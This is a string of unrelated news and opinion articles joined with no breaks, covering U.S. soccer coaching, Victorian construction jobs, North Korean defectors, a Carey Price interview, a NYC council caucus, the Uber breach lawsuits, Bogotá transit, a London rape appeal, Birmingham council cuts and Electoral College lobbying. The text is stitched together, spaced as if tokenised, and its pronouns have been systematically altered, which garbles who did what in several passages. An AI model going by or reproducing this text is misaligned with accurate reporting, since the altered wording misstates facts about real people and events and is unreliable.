This is n't a low-key job . There is n't a lot of time for golf and shopping , which , cynically , is one of the draws of national team management . Capello does n't even have to leave the country to see their entire player pool in action , since all of their players compete in England This is exceptional . But the U.S. is at the other end of the spectrum , with just a handful of players plying their trade at home in Major League Soccer ; the rest of the regulars are scattered over about a dozen countries . That alone makes tracking their progress a full-time job , as evidenced by the long hours and many air miles Bradley and their staff log in keeping up with their players .
Kevork Djansezian/Getty Images Bradley consoles Tim Howard after the U.S. 's loss to Mexico in the Gold Cup final .
6 . It 's not a good résumé-builder
Sometimes taking a job with a club or national team that is smaller in stature than your usual employers makes sense . This is the lesson we learned from Steve McClaren . They failed spectacularly with England , then left to the Netherlands to head up FC Twente . They were able to lick their wounds and rebuild their reputation in peace .
But hitting up a smaller club or country team is only worth doing if you can make an unfancied side really stand out . The U.S. , while not a big player on the international scene , is n't a minnow anymore . In three World Cups , the Americans have advanced past the group stage twice . Expectations are high now , whether they 're realistic or not . So unless a manager propels the U.S. to the semifinals of the World Cup , no result will really be eye-catching . And anything less will likely be seen as failure .
The U.S. , in other words , is not likely to make you look a whole lot better than you did before taking the job .
7 . Expectations are inflated
The U.S. has all of three players who are major contributors with decently big European clubs -- Dempsey at Fulham , Howard at Everton and Holden at Bolton . Donovan is also considered to be at their level , as they lead the L.A. Galaxy . But there are n't enough Americans performing at the highest level to justify the expectation -- from not only the fan base , but also the Federation -- that the U.S. team reaches the second round of every World Cup at a minimum . This is n't realistic , or even objective , when you take a good , hard look at the player base .
8 . There 's no precedent
The U.S. has never had a big-time manager before . It 's always gone either with homegrown coaches or obscure foreigners . This does n't mean it ca n't happen , but it 's something managers look at : Who has had the job before , and what did it do for him ?
What 's more , only one big-name manager has ever even shown an interest in the position of U.S. head coach . Former standout German forward Juergen Klinsmann turned down the job in 2006 , and was also approached in 2010 , before the job ultimately landed in Bradley 's lap . In both cases , U.S. Soccer was reportedly unwilling to put down in writing the extensive mandate it promised Klinsmann verbally -- that they would have complete control over the senior team . But like it or not , Klinsmann 's pedigree has flaws . They did impressive things rebuilding and reinventing Germany 's program . Yet their stint at the head of Bayern Munich -- where their attempts to overhaul everything the club was doing quickly got them shown to the door -- is a blemish on their record .
Managers are like sheep : They follow each other around . The fact that no big-name manager has come to the U.S. makes it unlikely that any one will .
Perhaps this is a pessimistic appraisal of where things stand with the U.S. national team . There are always people out there looking for jobs : good coaches and bad ones . It 's just important to remember that while U.S. fans may dream of a big-time manager , a big-time manager may not dream of taking over as head coach of the U.S. team .
Leander Schaerlaeckens is a soccer writer for ESPN.com . They can be reached at leander.espn @ gmail.com . Follow them on Twitter at @ LeanderESPN .
The total work delivered by big contractors for government capital projects has fallen by nearly $ 1.5 billion , or 37 per cent , in the past two years , according to government figures . Winding up ... M80 is a $ 2.25 billion project , jointly funded by the Australian and Victorian governments . About 1300 people worked directly on the site , with others working off site in design and planning . As it nears completion it employs about 50 workers on site . Credit : Ken Irwin The jobs losses add to a record slump in the new housing sector that has contributed to the largest decline in construction jobs since the early 1990s . The decline in building puts thousands more Victorians in related fields under pressure , with suppliers of building materials such as Boral and leading design companies laying off hundreds of engineers , surveyors , workers and contractors . The Master Builders Association said there were about 254,100 Victorians employed in the industry in November 2012 , but that was 12,200 fewer jobs than the year before , a drop that was more than double the national trend for the industry .
Executive director Brian Welch said the building and construction sector employed about 10 per cent of Victoria 's full-time workers , making it the second-largest employment provider in the state . '' We face a challenging year ahead that will inevitably force many more building companies to continue to adapt or perish , '' Mr Welch said . A unanimous chorus of industry leaders - from lobby groups , peak bodies , unions and economists - say capital spending is the lifeblood of the Victorian economy , which is under increasing strain because of the building decline . They are calling for the state and federal governments to fast-track funding for the next round of big-ticket projects - including the East-West Tunnel and Melbourne Metro Rail tunnel - which are all a year or more away from building getting started . Engineers Australia 's Victorian spokesperson , John Wilson , said the Baillieu government put a raft of big projects on hold when it came to power , including a six-month delay for regional rail . The delay created a costly lag between the current jobs finishing up and a host of new projects getting started , they said .
'' The major projects have been slowly drying up and there is nothing to replace them , the whole industry is waiting for the next set of projects , '' they said . '' We are at a critical time where the skills we have procured here in Victoria are migrating to other places and they wo n't necessarily come back . You ca n't just turn on the skills needed . '' The director of the Victorian branch of the Australian Industry Group , Timothy Piper , said it was one of the most significant economic issues for Victoria , and a lack of `` cranes on the skyline '' represented poor economic health . '' Since the Kennett Government and CityLink , we seem to have developed a pipeline that has ensured that those big infrastructure companies have continued to have work and provide employment , '' Mr Piper said . '' We have become very accustomed to having a pipeline of infrastructure projects , but beyond the regional rail link there 's not a great deal going . '' We need to have momentum in the state for new employment and for the current companies to maintain their efficiency standards . It is a vital aspect of an economy that does n't have a strong resource base . ''
The executive director of the Victorian division of the Property Council of Australia , Jennifer Cunich , said the industry was increasingly worried about where the next building projects would come from and this uncertainty was resulting in a downsizing of the Victorian workforce . '' If Victoria continues to bleed skilled workers to its competitor states , our ability to manage a future economic resurgence will be severely constrained , '' they said . The chief executive of Infrastructure Partnerships Australia , Brendan Lyon , said Victoria could borrow only a few billion dollars before it would risk the loss of its AAA credit rating . '' When you look at the next three major projects that are needed - the East-West road link , the Melbourne Metro rail tunnel and the completion of the north-east section of the ring road - you 're talking projects worth well over $ 20 billion , '' they said . '' Victoria can not just print money to fund its infrastructure investment and that means immediate action on any of these projects will require the federal government to be at the table with their cheque book . ''
The state secretary of the Victorian Branch of the Australian Workers ' Union , Cesar Melhem , said there were lots of `` very grim '' construction workers looking for employment , but some were changing jobs or moving interstate . '' Even if the government starts stimulating new projects , there is still going to be a lag of at least 12 to 18 months where I 'm anticipating there is going to be a disastrous drop in construction jobs in Victoria . It is not looking good at all . '' '' It 's very grim , there are heaps of construction workers looking for work and not many projects so a lot them are changing jobs or going to other states . '' A spokesperson for the Baillieu government said it was delivering a record $ 5.6 billion infrastructure program this year , which included the Victorian Comprehensive Cancer project , Melbourne Park redevelopment , Melbourne Fire Brigade Training Facility at Craigieburn and Shrine of Remembrance upgrade . '' This record infrastructure investment is a vital part of the Victorian Coalition government 's economic strategy to generate jobs , boost productivity and grow Victoria 's economy , '' they said .
The government , they said , was `` planning , building and delivering a significant infrastructure agenda to begin addressing Victoria 's infrastructure backlog '' . '' There are a number of major projects currently in construction , and construction will start on more Coalition government major projects this year . ''
China has not responded to past queries regarding its decision to repatriate defectors , who face persecution , torture , as well as long detentions upon repatriation to North Korea . Photo by Stephen Shaver/UPI | License Photo
GENEVA , Switzerland , Dec. 15 ( UPI ) -- The United Nations Committee Against Torture has called for an immediate end to the forced repatriation of North Korean defectors in China .
The U.N. body and the U.N. High Commissioner for Refugees are urging for the free and safe passage of North Korean refugees , Voice of America reported Tuesday .
The Committee Against Torture said on Nov. 17-18 that members reviewed China 's fifth country report , submitted to fulfill a requirement as a signatory to the U.N. Convention Against Torture .
The U.N. body said it is most concerned China is classifying North Korean defectors as illegal economic migrants , because this then justifies repatriation to North Korea where persecution , torture , as well as long detentions await returnees .
RELATED North Korea blames South for breakdown in talks
`` Defectors face torture , arbitrary detention , rape , forced labor , '' said George Tugushi , the Committee 's vice chairperson , adding North Korean women who are impregnated by Chinese men are forced to undergo abortions upon repatriation .
The committee said more than 100 cases of systemic torture and ill treatment have been filed with the U.N. , and added the repatriation of North Korean victims of human trafficking must end without delay .
In a separate statement , the U.N. High Commissioner for Refugees called for access to North Korean defectors in China , so as to determine their status as refugees .
The U.N. Commission of Inquiry previously has said China has forcibly returned tens of thousands of North Korean nationals who were most likely subjected to punishment upon their return .
In November , 10 North Korean defectors were taken into Chinese custody after being sent back from Vietnam , where it is likely they were seeking asylum at a South Korean embassy .
China has not responded to past queries regarding its decision to repatriate defectors .
RELATED Russia to help North Korea gather data on Siberian tigers
Although Beijing and Pyongyang cooperate on defector repatriation , relations have not improved since the abrupt cancellation of North Korea 's all-female Moranbong Band 's weeklong `` friendship '' tour .
Radio Free Asia reported Tuesday the move to cancel the tour was a regrettable decision , and that Kim Jong-un is the `` international odd man out , '' according to North Koreans residing outside the country .
Carey Price was having a tough practice at the end of an admittedly frustrating season .
The Montreal Canadiens ' star stopper had already made kindling of two sticks across the top of their cross bar . So much for the notion Price does n't care enough .
As practice came to an end , however , Price was not among the first to bail for the locker room . Instead they sought out goaltending coach Pierre Groulx for some extra situation-specific work after practice . So much for the theories they do n't work hard enough .
Price even stuck it out after cutting one of their toe ties during the drill , stopping several times to try and get the loose lace tied back on at least enough to continue working .
As for what they were working on , a still-steaming Price dismissed the inquiring minds of the media scrum after a couple of pointed , poorly timed post-practice questions about the frustration of a lost season , but then graciously took 15 minutes for some one-on-one time with InGoal to go over the things they were working on , and take a handful of Ask a Pro question from our readers .
It started with a review of their late-practice session with Groulx ( InGoal has some video highlights below ) , which Price said was based on giving up a goal to Calgary captain Jarome Iginla earlier in the week ( NHL.com video also below ) on a bit of a broken play after a blocked shot left Price over-committed and unable to get across for a wraparound after Iginla cut behind the net .
So Price worked on their movements out of VH , or one-pad down , with Groulx .
“ It 's the minor adjustments that are important , things you do n't really think about doing in a game but that 's why you practice , so you do n't have to think about it , ” Price told InGoal after the extra session . “ Like a small adjustment like that . I got beat from the side of the net by Iginla in Calgary so then you come back and go over the things you should have done correctly and try to drill it into you so you do n't have to think about it when it comes to game time . ”
Here is the video of the goal :
… and here is the video from Price 's response while working with Groulx :
That 's also the perfect place to start this week 's Ask a Pro with Price , since their silky smooth crease movements , especially on the knees , was a favourite subject – along with questions about their new Reebok equipment – for the InGoal inquisitors :
~ InGoal reader David Alexander asks : Carey seems to be a guy who tends to get their body in front of pucks in tight , especially on rebounds . In particular they tend to make some tremendous saves on rebounds in tight , but makes them look so easy . Could they talk about what they do to get their body in front of so many pucks in tight as opposed to opening up in a desperation format . Obviously their power pushes are outstanding , but are there any other keys they use . And Marc Bidder adds : Carey always seems so square to the puck and their angles are always on , without being too far outside the paint . What do they do to practice this and what can we do to improve our positioning/angles/anticipation ?
Carey Price : “ I think that 's credited to Rollie ( Melanson , the former Canadiens ' and current Canucks ' goalie coach ) actually . My first four years , that 's all we did was movement drills , especially down . The move while I was down was always my strength and being able to cover the bottom of the net has been a strength since working with Rollie . ”
~ InGoal follow up : are we seeing some more pop-up recoveries in the mix these days too ?
Carey Price : “ Yeah , I mix it up . I 've been a lot more just reacting and I know Tim ( Thomas ) is a big believer in just doing whatever it takes , so I kind of mix it up more now . ”
~ InGoal Facebook fan Cody Osborne asks : Any crease movement drills – mainly butterfly slides/recovery – you can recommend ?
Carey Price : “ Yeah , one of the movement drills we do a lot is start on the post and go out towards the far dot , squaring up to the far dot , and then back to the short-side post and back across . We do that one a lot , and then mix it up going to the short-side dot first and then back across to far post . Those are the basic warm up drills we do , just mimicking movements in the game . ”
~ InGoal reader Scott Forbes asks : They always have such a calm and cool swagger when they play . When things are not going well how do they maintain that swagger ?
Carey Price : “ I think it 's a bit of both experience and personality . It 's just about being confident and enjoying what you are doing . You get frustrated obviously at times , obviously , just from being a competitive person , and I think I just have a blend of competitiveness and cockiness and attitude I guess . ”
~ InGoal Facebook fan Tristan Helik asks : Playing as a goaltender is all about focus . Is it difficult to focus and play in a city like Montreal ? How do they react to the pressure ? Jason Wakeley adds : When a lot of people wrote you off as a starter what did you do to prepare yourself mentally to overcome that obstacle ? And InGoal wonders about the frustration of hearing how calm and composed they look when the Canadiens are winning , but that it is interpreted as being too casual or not trying when they are losing ?
Carey Price : “ I 've learned not to listen . You grow thick skin when you play in a hockey market , any guy will tell you that , whether it 's Loungo here in Vancouver or ( James ) Riemer or ( Jonas ) Gustavsson in Toronto . It 's just the nature of the position and markets and if it has n't changed in the last 100 years it 's not going to change in the next 100 . ”
~ InGoal reader Nicholas Giroux asks : Got any tips for playing the puck ?
Carey Price : “ I think the key to puckhandling is being aware of the forecheck . We do a lot of scouting of other teams forechecks so we kind of know what they are going to be bringing . So being prepared for a 2-1-2 , or a 1-2-2 , you have to know what is coming at you , and that makes a really big difference when you are going out of the crease to play the puck . ”
~ InGoal Facebook fan Daryle Gessner asks : Have you read “ The Game ” and if so what point from the book really rang true ? Also , what are your go-to music pre- and post-game ? And Tyler Wenande wonders : How do you get in “ the zone ” before every game ?
Carey Price : “ The Game , no I have n't read it yet , and I do n't really have any specific music . I just listen to whatever is blaring on the stereo in the room . This year there is more country music , though ( Price participates in rodeo during the summer months ) . I think I pull a little bit more weight in the room . When I first came here I would n't have been able to get a country song on the stereo to save my life but now , even this morning , that 's all we played was country , so that 's changed a little . But I 'm pretty normal in my preparation . I just do some stretching and whatnot . I get dressed really early . I start getting dressed about half an hour before warm ups . A lot of guys will start getting dressed like 10 minutes before warm up , but I am usually in my gear like 15 minutes before I get on the ice for warm up . I do a lot of just thinking about what we talked about in our morning meetings , about their power play set ups , or their forechecking for instance . I think about a lot of things like that . ”
~ InGoal reader B. Hill writes : Ask them why they switched to the the Reebok P4 's and I heard they spent a lot of time tinkering and modifying their new P4 's ? What kind of things has they done to these pads ?
Carey Price : “ My pad has actually evolved this season . Even from when I switched in the summertime to now , it 's a very different pad . I put the knee strap down there ( onto the outer wrap by the calf ) so it reduces the binding behind the knee . And I started out with no breaks in the pad , but found it really stiff and I found it really hard to overlap ( in front of my knees ) so I found I wound up going down like Giguere , with a really narrow butterfly and the pads not closed in front of me and depending on the kneepads to close the 5-hole . And I 'd never played like that before so over the course of the season I added the middle break ( at the knee , both external and internal ) and I just recently added the pre-curve up top . This is my first set of pads with the pre-curve above the knee . It 's good , it really helps close the 5-hole a lot , especially on tips and stuff , where you are kind of reaching , it just closes up and seals . … It 's a very consistent pad in terms of both how it arrives and the way it breaks down . I just like the way it feels on the ice more than anything , I find it 's the best pad for sealing the ice that I 've tried . ”
~ InGoal follow up : We can see you 've also removed the knee cradle , putting only the thin piece back on top of the knee stack itself to maintain the overall thickness of the area you land on , but keeping the rest wide open to allow the pads to rotate even more easily around your kneepads . Have you changed anything else around the knee area ?
Carey Price : “ I actually use the IIHF kneestack , I do n't use the NHL regulation one , so it 's actually smaller . It 's shorter ( width wise ) . Just because when I was trying to bring my knees together , the corners of the stack would come together and leave a space between my knees above it . If they were a bit too long I could n't get everything else closed above them , so I found shortening that up allowed my kneepads to come together . ”
Price had a few more answers for InGoal , including about the changes he 's made in both their initial depth and glove positioning in the NHL , and a great response to custom stick questions from Dec Ryan and Joe Pippel . But we are going to save those for the next edition of the InGoal Digital Magazine , including a how-to tip based on the stick response that can help your puck handling !
So stay tuned , and in the meantime a big thank you to Carey for taking the time to talk to InGoal Magazine , and be sure to check out the photos below for more shots of how their gear is working for him :
On Wall Street , bonuses are back . Bolstered by a government bailout in the hundreds of billions , New York City 's financial sector is once again riding high . But just off of Wall Street , neighborhoods across New York City are struggling to pull out of an economic crisis that has left too many New Yorkers without jobs or homes–a crisis largely rooted in speculative real-estate investments that saw our neighborhoods as commodities to be packaged by investment banks .
The divide between Wall Street and the rest of New York predates the economic downturn . While the economy was booming , New York City largely failed to share the benefits of growth across lines of race , class and neighborhood . The Bloomberg administration 's economic development policy focused on real estate development , subsidizing mega-deals to create luxury housing for the wealthiest and retail malls with mostly low-wage jobs . We passed up too many opportunities to invest in more diverse sectors , or to improve job quality for the millions of New Yorkers facing poverty even while working .
Today , as we struggle with continued foreclosures , an anemic economy and the large deficits facing the city and state , we hear constant calls for fiscal austerity–to balance the budget on the backs of those most in need , slashing child care and senior centers , laying off teachers and pushing families into homelessness by eliminating subsidies .
We disagree . We believe that New Yorkers want a more just , more equal city . We believe that as we work our way out of this crisis , New York City can and must plan a recovery that looks to narrow the growing economic divide .
Last fall New Yorkers spoke loud and clear at the polls , sweeping progressive Democrats into office in City Council and citywide elections . Today a dozen of us are forming the New York City Council Progressive Caucus–to work as an organized group of policy-makers committed to the idea that now is the time to renew New York City 's historic commitment to policies that expand opportunity . At so many points in our history , New York has chosen to invest in public infrastructure , job creation , better working conditions and stronger neighborhoods . We created the nation 's first and best public transportation system , established the first building and zoning codes , and launched public works programs that built everything from public swimming pools to airports to health clinics to affordable housing . We partnered with unions to insure not only a more equal share of the fruits of our labor but a city where working-class families could find neighborhoods that offered decent public services and a good place to raise a family .
In recent years , however , other cities have done more to blaze a progressive trail . In Los Angeles , the primary goals of the economic development agency are to create living-wage jobs for residents of low-income neighborhoods , and to nurture sustainable communities . Boston and Denver and London and Barcelona require that all new housing developments include affordable units . San Francisco requires that all workers have at least five paid sick days , so they do n't have to go to work when they 're sick , putting themselves , their families , and the public at risk .
Mayor Bloomberg has taken some good steps in recent years–promoting environmental sustainability , combating illegal guns , advancing public health–and we are proud of those places where the New York City Council has partnered with them in these efforts .
But in key respects , they have fallen short . The Bloomberg administration has done little to confront inequality , preferring instead a trickle-down economic approach . And the Mayor has frequently undermined grassroots democracy , by extending term limits and mayoral power , instead of seeking to partner with New Yorkers in developing solutions .
We are forming the New York City Council Progressive Caucus to confront both of those gaps . We will combat inequality head-on , building on what other cities have done , to help create a new economy that offers good jobs , thriving communities and a healthy environment for all . And we 'll do it by involving New Yorkers across lines of race , class and neighborhood in conversation and action about the direction of our city .
Brad Lander ( D-Brooklyn ) and Melissa Mark-Viverito ( D-Manhattan/Bronx ) are the co-chairs of the New York City Council 's new Progressive Caucus . Other members of the Progressive Caucus are Annabel Palma , from the Bronx ; Letitia James and Jumaane D. Williams , from Brooklyn ; Margaret Chin , Rosie Mendez and Ydanis Rodriguez , from Manhattan ; Daniel Dromm , Julissa Ferreras and Jimmy Van Bramer , from Queens ; and Deborah Rose , from Staten Island .
It has now been a full week since the jaw-dropping revelations that Uber sustained a massive data breach in 2016 , which affected more than 57 million people .
Since November 21 , the company has been hit with 10 federal lawsuits ( including the two Ars reported on last week ) . On Monday , the city of Chicago and Cook County also sued Uber in Illinois state court , while numerous senators are now demanding answers as well .
The cases allege substantial negligence on Uber 's part : Plaintiffs say the company failed to keep safe the data of the affected 50 million customers and 7 million drivers . Uber reportedly paid $ 100,000 to delete the stolen data and tried to keep news of the breach quiet by having the hackers sign non-disclosure agreements .
In the case of City of Chicago v. Uber , city and Cook County lawyers wrote that in October 2016 , then-CEO Travis Kalanick was contacted by two hackers who claimed to have millions of individual Uber customers ' records . `` In striking resemblance to the 2014 breach , the hackers had accessed a private GitHub repository and found database login credentials , '' Chicago 's attorneys argued .
`` While the repository was password-protected , hackers were still able to breach it—indicating either a very weak password or the fact that the user credentials for the repository were found in a previous unrelated data breach . And even though Uber specifically promised regulators that it would use two-factor authentication on services like GitHub , it clearly failed to implement that promise . Once inside the GitHub repository , the attackers once again found AWS login credentials , which the attackers then used to access and extract the personal information of over 50 million people , including Chicago and Illinois residents . ''
Last Tuesday , CEO Dara Khosrowshahi wrote : `` None of this should have happened , and I will not make excuses for it . ''
According to The Wall Street Journal , Khosrowshahi learned of the breach two weeks after they took over the company 's top job on September 6 , and , yet , they kept quiet for more than two months .
Chicago attorneys also wrote that the company 's claim that the stolen data has been fully expunged is `` nonsensical . ''
`` It has not demonstrated , in any way , how or why it knows the data was actually deleted , '' they wrote . `` No matter what documents the hackers signed , or representations they made , Uber is saying little more than that they trust the word of criminals . ''
“ Integrity ”
Ten broadly similar proposed class-action suits were filed in several federal courts across the country : in San Francisco ; Los Angeles Chicago Portland ; ; and even Huntsville , Alabama
On Monday , a group of senators , led by Sen. John Thune ( R-S.D . ) and Sen. Orrin Hatch ( R-Utah ) , specifically asked for a `` detailed timeline '' of the incident , among other demands due by December 11 .
Similarly , Sen. Mark Warner ( D-Va. ) also had an even more damning question : `` To the extent Uber had lawfully acquired information enabling it to identify the hackers who had compromised its systems , ensure they would abide by agreements to delete the data and not to disclose the breach , and transfer them $ 100,000 , it conceivably had enough information at hand to assist law enforcement in the apprehension of these criminals , '' they wrote .
`` Why did Uber choose not to provide relevant forensic information to law enforcement and has this information been provided to law enforcement in the last week ? ''
Uber spokesperson Molly Spaeth sent a statement to other media , including the Chicago Tribune , which read : `` We are committed to changing the way we do business , putting integrity at the core of every decision we make , and working hard to regain the trust of consumers . ''
Uber has not responded to Ars ' multiple requests for comment .
In the past decade or so , bus rapid transit ( BRT ) has become a popular mass transit option for a number of cities in the United States and around the world . The first such system opening Curitiba , Brazil in 1974 . However , for the quintessential model of the full potential of a successful BRT system , one only need to look to the capital city of Colombia , Bogota . According to a detailed study released by the United States Department of Transportation in 2006 :
“ Serving the city of Bogotá , Colombia , TransMilenio is one of the world 's premier Bus Rapid Transit ( BRT ) systems . In January 2006 , the system carried over one million passengers per day on a network of high-capacity trunk corridors , supported by feeder services that extend system coverage to peripheral areas of the city . TransMilenio is also the centerpiece of a long-term urban renewal and mobility strategy that prioritizes walking and cycling and discourages private vehicle use . Encouraged by TransMilenio 's success , the Colombian government is now embarking on a major program to construct similar systems in cities throughout Colombia . ”
According to recent estimates , metropolitan Bogota has nearly eight million residents . A successful bus rapid transit ( BRT ) system such as TransMilenio in Bogota , Colombia should include most , if not all of the following features :
Bus only , grade-separated ( or at-grade exclusive ) right-of-way
Comprehensive coverage
Serves a diverse market with high-frequency all day service
Bus priority
Vehicles with tram-like characteristics
A specific image with a brand name : ( e.g . TransMilenio in Bogota )
: ( e.g . TransMilenio in Bogota ) Off-bus fare collection
Level boarding
Stations versus stops
Each of the features listed above are meant to improve service by making the system more user-friendly , reduce loading/unloading times , and create a comprehensive and efficient network . Ridership projections made in 2004 indicated that the new system would peak at 673,000 passengers per day . As of January of 2006 , TransMilenio was carrying more than one million passengers per workday – with an astounding 41,000 passengers per hour per direction on certain routes during peak periods . In 2009 the daily ridership data had increased to 1.4 million per day .
Is bus rapid transit ( BRT ) the “ be all , end all ” solution for every congested metropolitan area ? No , of course not . But BRT does offer another option for transportation planners and engineers to consider in addition to light rail , commuter rail , modern streetcars , water taxis , and traditional bus networks . Bogota , Colombia has shown us that BRTs can present a viable option that competes effectively with the other mass transportation mode choices . Each individual community must decide which option ( s ) are best for them based on their political , social , economic , topographic , and transportation dynamics . For Bogota , Colombia , TransMilenio was the correct choice and all those involved in its creation and operation should be commended . Kudos !
Advertisements
The men , were caught on CCTV approaching the 34-year-old woman and purposely leading them away from the main road . Police said that the woman had been in Central London for a night out with friends - in an area full of nice bars , restaurants and clubs . But as they walked down Greek Street at 12.15am on 20 March three men , of Asian appearance , approached them
Met Police This is the chilling moment a suspect led a woman to a quiet street in London and raped them
One of the suspects took them by the hand , as though they were acting like a Good Samaritan , and led them down the road while the other two walked slowly behind them . The man led them to a secluded street called Slingsby Place - where at least two of the men raped them
Met Police The Asian man walks closely to the woman as they lead them down the street
The street is close to a Jamie 's Italian restaurant and SUDA Thai cafe , both busy eateries , where police hope someone saw something . Detective Constable Ben Lucas , from the Metropolitan Police 's Sexual Offences , Exploitation , and Child Abuse Command said : `` This was a a terrifying ordeal for the victim who naturally remains extremely distressed by what happened . `` We have released footage of the suspects in Greek Street in the hope someone will recognise them or saw them that night .
Met Police One of the other suspects followed along the street a short distance behind
`` If you have any information please come forward . '' Police have released CCTV images of the men in a bid to catch them . The men are all in their 30s and the one who led them to the quiet street had a shaved head and was wearing a blazer , trousers and smart shoes .
Met Police The third , well dressed man , also followed a short way behind
Met Police Police are urging anyone with information on these three suspects to come forward with information
Mark Rogers regrets decisions they have had to make after £650m budget cut since 2010 , and says next year will be toughest yet
Birmingham city council 's chief executive has said there could be “ catastrophic consequences ” for some people in the city because years of cuts have forced it to slash funding for key services for vulnerable people .
Mark Rogers , who runs the biggest council in England , said the effects of six years of austerity meant Birmingham 's youth service had “ all but gone ” , homelessness prevention services had been cut by so much that rough sleeping had quadrupled , and far fewer elderly people were eligible for care at home .
In an interview with the Guardian , they also said a network of children 's centres designed to serve the city 's most deprived communities had been dismantled so that now only the “ super-deprived ” were being helped , and even these remaining services were under threat .
Rogers said the council had reached “ a deadly serious situation for too many vulnerable people who face the prospect of not having their needs met ” . They said that as a non-elected official it was not their place to use words such as “ catastrophic ” , but added : “ We are fast reaching the point where there could be catastrophic consequences for some people . ”
Rough sleeping on rise in Birmingham after cuts to homelessness services Read more
The council has almost halved its headcount since 2008 , from around 24,000 to 12,500 , and says staff numbers could be as low as 8,000 by 2020 . By that point the council will have made £800m worth of cuts since the era of austerity began in 2010 , and expects to have lost 50 % of its grant from central government .
Eligibility for adult social care has been restricted so that only people with “ substantial and critical ” needs now receive help . Rogers said : “ We are having to be much more stringent about that eligibility . We get the legitimate criticism that people providing home care support are only there for 15 minutes . ”
As the government debates how to bridge a vast national social care funding gap , this year another £28m was cut from Birmingham 's adult care budget of £230m . The council is still cutting 10 % a year . “ The big disaster that is coming is if the government does n't do anything for social care , ” Rogers said .
They said 2017/18 would be the toughest year yet for the council , with expected reductions of £113m to the council 's overall budget , on top of the £650m already cut since 2010 . “ It is the seventh year of cuts and next year has the last huge slug in it . ”
They said they regretted the cuts they had been forced to make to important services , and listed half a dozen areas . In addition to social care , they singled out cuts to homelessness prevention services as one of the reasons why rough sleeping in the city had quadrupled since 2010 . This month a homeless man died on the coldest night of the winter so far , and charities said the risks of more people dying were “ massively increased ” because of the cuts .
Rogers also highlighted cuts to council youth services . “ The youth service has all but gone . In 2010 it would have been seen as one of the exemplar programmes in the country , we would have had dozens of youth services . Now we have just two youth centres , with the possibility of further reduction . ”
They said Birmingham was in the “ unenviable position ” of competing with Liverpool to be classified as the city in England worst affected by local authority cuts , but councils throughout the UK faced similar difficulties . The Local Government Association said councils in England and Wales had dealt with a 40 % real-terms reduction to their core government grant between 2010 and 2015 , and had made a total of £20bn in savings , losing 350,000 full-time staff members .
“ We are not desensitised to what 's happening , but we have got used to having to do this systematically . We need to take the least worst decisions that we can , ” Rogers said .
Facebook Twitter Pinterest Birmingham town hall and council HQ . Photograph : Christopher Thomond for the Guardian
Birmingham had 40 advice centres in 2010 ; now there are just four . “ I think those information and advice and guidance services that help people who have n't quite tipped into severe distress are the things that I most wish we still had .
“ We know the more impoverished someone is , obviously , the less money they have , the less ability they have to travel around to find help and advice . We had quite an extensive network of neighbourhood advice centres , council-funded places where people could get advice on a range of issues , particularly housing . We have consolidated them down to a very small number . ”
The council has not reduced bin collection services , and libraries and sports centres so far remain largely unaffected , so the scale of the cuts is not visible to many residents . Around 80 % of the council 's budget is spent on 20 % of the population , the most vulnerable people who are most reliant on state support ( and who are often least able to protest against reductions in services ) . “ It is those vulnerable people who are disproportionately hit , ” Rogers said .
They were concerned about ongoing cuts to the children 's centres in the city . The council has put the remaining services out to tender and is looking to recontract at a considerably lower cost , with further cuts of at least 10 % .
“ They have halved already in number . They were designed to serve the most deprived communities ; now they are serving the super-deprived communities and that is under threat because of the need to save , ” Rogers said .
The survival of some nursery provision is also under threat . This was a particularly sensitive area , they said with an unhappy laugh , “ given that giving children a good start is one of the council 's priorities ” .
Rogers was also sorry about cuts made to environmental health inspections . “ We are doing far less monitoring than we would like to around basic food hygiene and safety . We have n't seen an increase in food poisoning yet but we have removed the preventive aspect of that work , giving advice on how to keep restaurants and cafes fit for serving food , so we know we will have a less safe picture in the future . ”
' I worry about money all the time ' : the Jam reality in Birmingham Read more
The former leader of Birmingham council , Sir Albert Bore , warned of the difficulties to come as soon as cuts were announced , predicting the “ end of local government as we know it ” and sketching out a graph they dubbed the “ jaws of doom ” , with one line showing the needs of residents soaring and a second showing funding plummeting , creating an image vaguely evoking the open mouth of a crocodile about to bite . Now that the council is in the midst of the funding reductions , the predictions no longer feel alarmist .
This year will be the most challenging because all the easy savings have already been made . The council 's huge downsizing so far has mainly been achieved through voluntary redundancies and by not staffing unfilled posts , but the next wave of job cuts is more likely to include compulsory departures . “ We could be as low as 9,000 or 8,000 by 2020 , ” Rogers said .
They refused to subscribe to the Conservative argument – voiced most powerfully by the former communities secretary Eric Pickles – that local government was previously bloated . “ I do n't subscribe to the language of being fat or flabby , ” they said , although they acknowledged that “ with hindsight we could have spent that money with greater efficacy ” .
They believed the imposition of large cuts was not simply a response to the 2008 banking crisis . “ Deficit reduction enabled first the coalition and then the straight Tory government to pursue a straight Tory objective of a smaller state . ”
Rogers said they were not personally depressed by the work they had to do , but recognised that their colleagues were under intense pressure . “ I know that at this time of year in particular , large numbers of staff will feel seriously worried , as they should be , about their job security , because every year the council has had to get smaller .
“ Keeping your professionalism , while all around you each year there are fewer services , fewer staff , is one of the great challenges for every leader . How do you maintain the confidence of your staff when their jobs seem to be constantly under threat ? ”
Dozens of Democrats and one anti-Trump Republican are banding together in a bid to influence the Electors from 20 unbound states to not listen to their constituency and vote against Donald Trump as president . The 40 electors are demanding that the delegates be briefed by intelligence agencies regarding the potential of a Russian hack of the election before casting their ballots . The group hopes that the briefing would call into question the legitimacy of the election and whether Trump is fit to serve as the President of the United States . Hillary Clinton 's campaign manager , John Podesta , has also jumped on the legitimacy bandwagon but is doing so by proclaiming some rather blatant lies regarding pre-election media coverage .
Politico reports that 40 members of the Electoral College have presented an open letter to the Director of National Intelligence , James Clapper , asking that special security clearance is given to all the electors so that they can be briefed on all investigations related to the possibility of Russian interference in the presidential election . The letter , which was originally signed by 10 Electors , has been updated to include 30 more delegates from key blue states across the United States . In the call to action , the delegates note that it is their responsibility to “ ensure that the American people elect a president who is constitutionally qualified and fit to serve ” not to blindly cast a ballot in accordance with the votes of the people .
“ The Constitution envisions the Electoral College as a deliberative body that plays a critical role in our system of government — ensuring that the American people elect a president who is constitutionally qualified and fit to serve . ”
The delegates imply that they should not be bound by requirements to cast a ballot in favor of the voters chosen candidate but rather should be free agents able to vote for who they see fit as it is their duty to ensure the voting populace chooses a “ qualified ” candidate . The events leading up to the proposal are the result of a recent CIA statement noting they have “ high confidence ” that Russia acted covertly to harm Hillary Clinton 's chances at the presidency and to help ensure Trump 's victory .
Graffiti in Lithuania depicts Russian President Vladimir Putin and President-Elect Donald Trump kissing . ( Image by Mindaugas Kulbis/ AP Images )
